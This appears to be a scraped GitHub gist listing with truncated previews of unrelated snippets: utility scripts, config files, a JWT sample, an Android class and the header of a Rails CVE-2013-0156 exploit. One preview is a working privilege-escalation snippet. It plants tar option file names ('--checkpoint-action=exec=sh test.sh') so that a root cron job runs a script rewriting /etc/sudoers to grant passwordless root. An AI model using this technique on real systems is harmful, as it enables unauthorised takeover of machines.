This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from inspect import _empty, signature | |
def get_multiparameter_callback(callback, **parameters): | |
callback_sig_p = signature(callback).parameters | |
# If some provider parameter does not belong to callback parameters. | |
unexpected_parameters = list(parameters.keys() - callback_sig_p.keys()) | |
if len(unexpected_parameters) > 0: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ | |
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE> | |
echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh | |
echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh | |
echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh | |
echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh | |
echo "" > "--checkpoint-action=exec=sh test.sh" | |
echo "" > --checkpoint=1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: CI | |
on: [push] | |
jobs: | |
build: | |
runs-on: ubuntu-latest | |
strategy: | |
matrix: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
WEBHOOK_URL="put your url here" | |
PING="<@put your user id here>" | |
MESSAGE="$PING reminder" | |
JSON="{\"content\": \"$MESSAGE\"}" | |
curl -d "$JSON" -H "Content-Type: application/json" "$WEBHOOK_URL" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"30523382": { | |
"className": "Proxy", | |
"data": { | |
"bypassFPForPAC": true, | |
"color": "#f57575", | |
"configUrl": "", | |
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
"cycle": false, | |
"enabled": true, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
#http://docs.python-requests.org/en/latest/user/quickstart/#post-a-multipart-encoded-file | |
url = "http://localhost:5000/" | |
fin = open('simple_table.pdf', 'rb') | |
files = {'file': fin} | |
try: | |
r = requests.post(url, files=files) | |
print r.text |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function remove-docker-containers | |
echo "Stop running shit" | |
docker stop (docker ps -q) | |
echo "Remove the whale shit" | |
docker rm (docker ps -a -q) | |
end | |
function remove-docker-images | |
remove-docker-containers |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Target: | |
{ | |
"alg": "HS256", | |
"typ": "JWT" | |
} | |
{ | |
"sub": "1234567890", | |
"name": "John Doe", | |
"iat": 1516239022 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# | |
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156) | |
# | |
# ## Advisory | |
# | |
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion | |
# | |
# ## Caveats | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.sadieyu.logg; | |
import android.app.Activity; | |
import android.os.Bundle; | |
import android.util.Log; | |
/* | |
.class public Lcom/sadieyu/logg/MainActivity; | |
.super Landroid/app/Activity; | |
.source "MainActivity.java" |